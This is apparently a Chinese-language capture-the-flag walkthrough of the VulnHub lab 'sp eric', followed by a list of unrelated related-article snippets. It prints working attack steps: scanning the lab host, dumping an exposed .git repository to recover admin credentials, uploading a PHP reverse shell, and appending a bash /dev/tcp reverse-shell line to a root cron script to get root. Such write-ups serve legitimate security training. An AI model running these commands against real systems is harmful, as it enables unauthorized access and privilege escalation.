vulnhub系列:sp eric

vulnhub系列:sp eric

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240811143615596

nmap扫描端口,开放端口:22、80

nmap 192.168.23.189 -p- -A -sV -Pn

image-20240811143714473

dirb 扫描目录,.git 源码,admin.php文件,upload目录等

dirb http://192.168.23.189/

image-20240811143733217

访问80端口,没有发现

image-20240811143853630

拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果

image-20240811144043025

看看 .git ,使用 githack 下载源码

python2 GitHack.py -u http://192.168.23.189/.git/

image-20240811145145064

查看下载的源码,发现账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

image-20240811145222291

登录 admin 页面

image-20240811144831193

二、getshell

存在文件上传,kali 生成反弹 shell

locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .

image-20240811145901688

修改 IP 和端口后上传,上传后没有什么回显

kali 开启监听

nc -lvnp 4444

image-20240811150109682

虽然没有回显,但是访问 /upload/php-reverse-shell.php,成功反弹 shell

image-20240811150257799

三、提权

使用 python 提升交互性,发现没有python

python -c "import pty;pty.spawn('/bin/bash')"

image-20240811150528435

看一下有无 python3

which python3

image-20240811150603275

有 python3,那么用 python3 执行

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20240811150651778

在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件

image-20240811150824965

查看 flag.txt

image-20240811150901132

查看 backup.sh

image-20240811151224087

可能是计划任务,看一眼

cat /etc/crontab

image-20240811151349335

看了一下,backup.sh 拥有 root 权限,且我们可写可执行

image-20240811151655658

写入反弹 shell 的语句

echo 'bash -i >& /dev/tcp/192.168.23.133/9999 0>&1' >> backup.sh

image-20240811151837670

kali 开启监听

nc -lvnp 9999

image-20240811151925129

成功反弹 shell ,提权成功,是存在计划任务的

image-20240811152247677

最后在 /root 下发现一个 flag.txt

image-20240811152330931

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/399387.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

向上or向下调整建堆 的时间复杂度的本质区别的讲解

知识点:(N代表节点数,h代表高度) 1:高度为h的满二叉树节点个数N为 2^(h)-1 即N 2^(h)-1 2:所以h log(N1) 一:向上…

C++STL详解(四)——vector类的具体实现

在上篇文章中,我们已经学习了vector的具体接口使用方法,在本篇文章中,我们将学习实现一个vector容器。 目录 一.vector各函数接口总览 二.vector当中的私有成员 三.默认成员函数 3.1构造函数 3.1.1构造函数1 3.1.2构造函数2 3.1.3构造…

百数移动端重大更新:全面优化,用户体验再升级!

本次发布的优化更新的功能,主要是为了提升用户的移动端使用体验。此次改版不仅优化了控件样式,提升视觉与交互体验,还在子表单功能上实现了重大突破,如新增复制、插入行功能等。 同时,新增功能——数据加载&#xff0…

Python之简单了解pylab绘图工具和汇编语言

《Python入门经典以解决计算问题为导向的Python编程实践》89-93页的笔记。 用pylab对数据绘图最小的通用计算 用pylab对数据绘图 PyLab是Matplotlib面向对象绘图库的过程界面。Matplotlib是整个软件包; matplotlib.pyplot是Matplotlib中的一个模块;而P…

【物联网】(蓝牙篇)微信小程序ios如何自动打开蓝牙

微信小程序打开蓝牙的便捷之道——微信小程序ios如何自动打开蓝牙 随着智能手机蓝牙技术和物联网产品的普及,很多人在使用微信小程序时,都希望能够更便捷地打开蓝牙功能。 在iOS系统上,由于其封闭性和权限控制严格,使得自动打开蓝…

扩散模型理论与公式推导——详细过程速览与理解加深

参考: [1] Ho J, Jain A, Abbeel P. Denoising diffusion probabilistic models[J]. Advances in neural information processing systems, 2020, 33: 6840-6851. [2] 扩散模型/Diffusion Model原理讲解_哔哩哔哩_bilibili [3] 扩散模型公式推导_扩散模型数学推导-C…

10、java程序流程控制之二:分支语句(switch-case结构)、循环结构(for循环)(经典案例)

java程序流程控制之二: Ⅰ、分支语句:switch-case1、switch-case 分支结构:其一、描述:其二、代码为:其三、截图为: 2、switch-case 分支结构的案例1:判断是否合格其一、描述:其二、…

Docker数据管理和网络管理

文章目录 一、Docker数据管理Docker容器的分层哪些数据需要持久化容器数据持久保存方式数据卷(data volume)数据卷的使用场景数据卷的特点数据卷使用方法实际例子 二、网络管理Docker安装完成后默认的网络设置创建容器后的网络配置修改默认网络设置容器名…

“南禾”女士包网站的设计与实现----附源码17160

摘 要 随着社会经济的发展和人们生活水平的提高,女士包市场逐渐成为一个庞大的产业。女性消费者对于时尚、品质和个性化的追求,对于高品质、款式新颖的女士包需求不断增加。南禾作为中高端女士包品牌,为抓住了这一市场需求,为女性…

再见,Midjourney | FLUX 彻底改变了 AI 图像游戏

Flux 刚发布一周,大家都疯了! 因为真的是分不清是AI还是真实啊🏴‍☠️ Flux生成 Flux生成 FLUX 彻底改变了 AI 图像游戏。 02 黑深林 Black Forest Labs由Stable Diffusion模型的原班人马创立,旨在开发并开源高质量的图像和…

AI技术加速落地 港科广联手思谋打开智能缺陷检测新纪元

AI 技术应用落地的元年,工业是主战场,尤其是工业缺陷检测。 在“生产制造-缺陷检测-工艺优化-生产制造”的智能制造闭环链条中,基于AI的智能缺陷检测扮演着“把关者”的角色。但这个把关者长期以来却缺少一个称手的工具——样本量大、精度高…

【Cadence22】将别人发的原理图和PCB库修改为自己的库,进而继续制图

【转载】Cadence Design Entry HDL 使用教程 【Cadence01】Cadence PCB Edit相对延迟与绝对延迟的显示问题 【Cadence02】Allegro引脚焊盘Pin设置为透明 【Cadence03】cadence不小心删掉钢网层怎么办? 【Cadence04】一般情况下Allegro PCB设计时的约束规则设置&a…

Firefox滚动条在Win10和Win11下表现不一致问题?

文章目录 前言总结解决方法 前言 最近在写页面的时候发现一个非常有意思的事。Firefox滚动条在Win10和Win11下表现居然不一致。在网上几经查找资料, 终于找到原因所在。总结成下面的文章,加深印象也防止下次遇到。 总结 参考文章: Firefox…

云快充协议1.5版本的充电桩系统软件

介绍 小程序端:城市切换、附近电站、电桩详情页、扫码充电、充电中动态展示、订单支付、个人中心、会员充值、充值赠送、联系客服; 管理后台:充电数据看板、会员管理、订单管理、充值管理、场站运营、文章管理、财务管理、意见反馈、管理员管…

VBA学习(25):从一个工作表复制数据到另一个工作表

今天演示一个简单的例子,也是经常看到网友问的问题,将一个工作表中的数据复制到另一个工作表。 如下图1所示,有3个工作表,需要将工作表“新数据#1”和“新数据#2”中的数据复制到工作表“汇总”中。其中,在“汇总”工…

【Web】LIT CTF 2024 题解(全)

目录 anti-inspect jwt-1 jwt-2 traversed kirbytime scrainbow anti-inspect 因为一直while true,网页会卡死无法访问 const flag "LITCTF{your_%cfOund_teh_fIg_94932}";console.log(flag,"background-color: darkblue; color: white; f…

Python办公自动化:使用`xlutils` 修改Excel文档

在日常办公自动化中,除了读取Excel文件,我们还经常需要对文件进行修改或更新。在Python中,除了xlrd,还可以使用xlutils库来实现对Excel文件的修改操作。本文将继续以“巴黎奥运会奖牌榜.xlsx”文件为例,讲解如何使用xl…

eNSP 华为浮动路由

R1&#xff1a; <Huawei>system-view [Huawei]sysname R1 [R1]int g0/0/0 [R1-GigabitEthernet0/0/0]ip add 172.16.1.1 24 [R1-GigabitEthernet0/0/0]int g0/0/1 [R1-GigabitEthernet0/0/1]ip add 10.10.1.1 24 [R1-GigabitEthernet0/0/1]quit [R1]vlan 10 //e口是…

配置Google API,用JavaScript和Python读取Google sheet里的数据

[发布时间是2024年8月。技术流程可能会存在一些变动] 开头提醒一下各位公司&#xff0c;国内包括腾讯云华为云阿里云&#xff0c;国外包括AWS和GCP&#xff0c;希望你们在开发产品的同时把这方面的文档写的更清楚明白一些。 现在&#xff0c;随着办公逐渐云化&#xff0c;从云…

Linux学习笔记11(计算机网络)

目录 网络七层模型/五层模型 IP地址分类 CIDR Centos7的网卡IP配置 RockyLinux9的网卡IP配置 网络七层模型/五层模型 自下到上 物理层&#xff1a; 建立物理连接&#xff0c;传输 0 和 1 的比特流 数据链路层&#xff1a; 物理地址寻址&#xff0c;流量控制&#xff0c;差错…